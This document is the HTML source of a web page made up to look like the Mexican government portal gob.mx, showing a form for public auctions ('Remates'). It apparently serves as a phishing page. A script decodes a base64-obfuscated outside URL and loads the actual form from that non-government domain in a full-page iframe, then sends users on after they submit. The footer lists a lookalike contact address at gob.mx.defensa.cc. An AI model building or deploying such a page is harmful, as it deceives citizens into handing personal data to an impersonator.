<!DOCTYPE html>
<html class='no-js' lang='es'>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<title> El portal unico del gobierno | Gobierno </title>
<meta charset='UTF-8'>
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700,600,300' rel='stylesheet' type='text/css'>
<link href='favicon.png' rel='shortcut icon'>
<link data-turbolinks-track="true" href="cms/assets/application.css" media="all" rel="stylesheet" />
<link href="css/main.css">
<link href="css/font-awesome.min.css" rel="stylesheet">
<script src="cms/assets/application.js"></script>
<script src="cms/assets/imageReplace.js"></script>
<style >
     #whatsapp{
    position: fixed;
    right: 10px;
    bottom: 10px;
    }
      .interior h2, .interior h3, .interior h4, .interior p, .pagina h2, .pagina h3, .pagina h4, .pagina p {
  margin-bottom: 17px;
}
      .item-control i {
  background: #bc955c;
  color: #FFFFFF;
  font-size: 20px;
  padding: 5px 10px;
  align-items: center;
}
.recommended-item-control i {
  background: none repeat scroll 0 0 #bc955c;
  color: #FFFFFF;
  font-size: 20px;
  padding: 4px 10px;
}
.fa {
  display: inline-block;
  font-family: FontAwesome;
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.recommended-item-control i {
  background: none repeat scroll 0 0 #bc955c;
  color: #FFFFFF;
  font-size: 20px;
  padding: 4px 10px;}
nav-tabs li.active a, .nav-tabs li.active a:hover, .nav-tabs li.active a:focus {
  -moz-border-bottom-colors: none;
  -moz-border-left-colors: none;
  -moz-border-right-colors: none;
  -moz-border-top-colors: none;
  background-color: #bc955c;
  border: 0px;
  color: #FFFFFF;
  cursor: default;
  margin-right: 0;
  margin-left: 0;
  }
  a {
    color: black;
  }
  .nav-tabs li.active a, .nav-tabs li.active a:hover, .nav-tabs li.active a:focus {
  -moz-border-bottom-colors: none;
  -moz-border-left-colors: none;
  -moz-border-right-colors: none;
  -moz-border-top-colors: none;
  background-color: #bc955c;
  border: 0px;
  color: #FFFFFF;
  cursor: default;
  margin-right: 0;
  margin-left: 0;
}
.nav-tabs > li > a:hover {
  border-color: #0c231e #0c231e #0c231e;
}
.nav > li > a:hover, .nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav-tabs > li > a {
  background-color: #0c231e;
  margin-right: 0px;
  border: 1px solid #d5d5d5;
  border-radius: 0px;
  text-decoration: none;
  color: #fff;
  font-size: 16px;
}
.shop-details-tab {
    margin-bottom: 4 5px;
    margin-left: 15px;
    margin-right: 15px;
    padding-bottom: 10px;
    padding-left: 10px;
}.category-tab ul {
  background: #0c231e;
  border-bottom: 1px solid #bc955c;
  list-style: none outside none;
  margin: 0 0 30px;
  padding: 0;
  width: 100%;
}
form {
  background: white;
  padding: 20px;
  border-radius: 8px;
  max-width: 600px;
  margin: auto;
  box-shadow: 0 0 10px rgba(0,0,0,0.1);
}

input, select, textarea {
  width: 100%;
  padding: 10px;
  margin-bottom: 15px;
  border: 1px solid #ccc;
  border-radius: 4px;
}

button {
  background-color: #4CAF50;
  color: white;
  border: none;
  cursor: pointer;
}


    label { margin-top: 10px; display: block; font-weight: bold; }
    input, textarea, select { width: 100%; padding: 8px; margin-top: 5px; }
    button { margin-top: 20px; padding: 10px 20px; }
    .mensaje { padding: 10px; margin-top: 20px; display: none; }
    .exito { background-color: #d4edda; color: #155724; }
    .error { background-color: #f8d7da; color: #721c24; }
    </style>                      </head>
<body>
  <header class=" navbar navbar-inverse">
    <nav class="navbar navbar-inverse  navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-target="#navbarMainCollapse" data-toggle="collapse">
            <span class="sr-only">Interruptor de Navegación</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a href="xZ.html" style="padding: 1px 3px 3px 3px;" class="navbar-brand " title="Ir a la página inicial">
            <div class="logo-main"></div>
          </a>
        </div>
        <div id="navbarMainCollapse" class="collapse navbar-collapse">
          <ul class="nav navbar-nav navbar-right">

            <li><a href="https://coronavirus.gob.mx/" title="Coronavirus">Informacion sobre COVID-19</a></li>
            <li><a href="https://www.gob.mx/tramites" title="Trámites">Trámites </a></li>
             <li><a href="index.html" title="Gobierno">Remates</a></li>
                  </li>
          </ul>
        </div>
      </div>
    </nav>
<!-- Subnavegacion -->
<nav class=" navbar-inverse sub-navbar fixed-top"
     >
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#subenlaces">
        <span class="sr-only">Interruptor de Navegación</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <div class="collapse navbar-collapse" id="subenlaces">
      <ul class="nav subnav navbar-nav navbar-right">

    <li class="landing-btn">
                      <a href='https://www.gob.mx/defensa#7675'>
                Multimedia            </a>
            </li>

    <li class="landing-btn">
                    <a href='https://www.gob.mx/defensa#7680'>
                Acciones y programas            </a>
            </li>
    <li class="landing-btn">
                    <a href='https://www.gob.mx/defensa#9401'>
                Documentos            </a>
            </li>

    <li class="landing-btn">
                    <a href='https://www.gob.mx/privacidadsimplificado'>
                Datos Personales            </a>
            </li>
    <li class="landing-btn">
                    <a href='https://consultapublicamx.plataformadetransparencia.org.mx/vut-web/'>
                Transparencia            </a>
            </li>
      </ul>
    </div>
  </div>
</nav>
<style>




  .flag-banner {
  top: 70px  !important;
  }
</style>

</section>
  </header>
<main class="inner-page interior ficha">
  <div class="container">

<ol class="breadcrumb">
  <li><a href="xZ.html"><span class="icon icon-home"></span><span class="sr-only">Inicio</span></a></li>
  <li><a href="xZ.html">Inicio</a></li>
<li><a href="index.html">Remates</a></li>
  <li class="active">Formulario</li>
</ol>

<script>
  window.addEventListener('message', function(event) {
    if (event.data === 'formulario_enviado') {
      // Cuando el formulario se envía correctamente, redirigir
      window.location.href = 'acciones.html';
    }

    if (event.data === 'formulario_error') {
      alert('Error al enviar el formulario. Por favor intenta nuevamente.');
    }
  });
</script>
<iframe id="miIframe" width="100%" height="1200" style="border:none;" frameborder="0"></iframe>

<script>
  const urlCodificada = "aHR0cHM6Ly9ub3ZpZS5pbi9mb3JtdWxhcmlvLmh0bWw="; // Codificado con Python
  const url = atob(urlCodificada);
  document.getElementById('miIframe').src = url;
</script>

 <div class="row top-buffer"style="text-align: center;width: 100%;">
  <div class="col-md-12">
    <hr>
    <div class="print col-ms-12 col-md-12 col-xs-12">
      <span class="icon-printing"></span>
      <a href="#">Imprime la página completa</a>
        <p class="small" style="font-size: 14px; line-height: 1.6em;">
          La legalidad, veracidad y la calidad de la información es estricta responsabilidad de la dependencia, entidad o empresa productiva del Estado que la proporcionó en virtud de sus atribuciones y/o facultades normativas.
        </p>
    </div>
  </div>
</div>
  </div>
</main>
<footer class="main-footer">
  <div class="list-info">
    <div class="container">
      <div class="col-sm-3">
        <img  src="img/n.svg"  class="logo_footer" >
      </div>
      <div class="col-sm-3"><h2>Enlaces</h2> <ul>
                <li><a  href="https://datos.gob.mx/">Datos</a></li>
                  <li><a class="footer" href="https://app.conagua.gob.mx/transparencia/Contenido.aspx?n1=8" id="Transparencia" target="blank" title="Enlace abre en ventana nueva">Portal de Obligaciones de Transparencia</a></li>
                  <li><a class="footer" href="https://www.infomex.org.mx/gobiernofederal/home.action" id="PNT" target="blank" title="Enlace abre PNT en ventana nueva">PNT</a></li>
                  <li><a class="footer" href="http://www.inai.org.mx/" id="INAI" target="blank" title="Enlace abre sitio INAI en ventana nueva">INAI</a></li>
          <li><a class="footer" id="INAI" href="http://alertadores.funcionpublica.gob.mx/" target="_blank" rel="alertadores">Alerta</a></li>
          <li><a class="footer" id="SIDEC" href="http://sidec.funcionpublica.gob.mx/" target="_blank" rel="sidec">Denuncia</a></li> </ul>
      </div>
      <div class="col-sm-3">
        <h2>¿Qué es gob.mx?</h2>
        <p>Es el portal único de trámites, información y participación ciudadana.  <a href="https://www.gob.mx/que-es-gobmxZ.html" style="text-decoration: none;">Leer más </a></p>
        <ul>
  <li><a href="https://www.gob.mx/temas">Temas</a></li>
                      <li><a href="https://www.gob.mx/accesibilidad">Declaración de Accesibilidad</a></li>
          <li><a href="https://www.gob.mx/privacidadintegral">Aviso de privacidad</a></li>
          <li><a href="https://www.gob.mx/privacidadsimplificado">Aviso de privacidad simplificado</a></li>
          <li><a href="https://www.gob.mx/terminos">Términos y Condiciones </a></li>
          <li><a href="https://www.gob.mx/terminos#medidas-seguridad-informacion">Política de seguridad</a></li>
          <li><a class="footer" id="Marco Juridico" href="http://www.ordenjuridico.gob.mx/" target="_blank" rel="noopener" title="Enlace abre en ventana nueva">Marco jurídico</a></li>
        </ul>
      </div>
      <div class="col-sm-3">
       <h2>Contacto</h2>
            <a href="mailto:atn_ciudadana@gob.mx.defensa.cc  "> Dudas e información a atn_ciudadana@gob.mx.defensa.cc  </a> </p> </div> </div></div>  </div>
  <div class="container-fluid footer-pleca">
    <div class="row">
      <div class="col">
        <br><br></div></div></div>
</footer>
    <script src="https://kit.fontawesome.com/d14aa7e9c3.js" crossorigin="anonymous"></script>
    <script src="js/main.js"></script>
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>
</body>
</html>
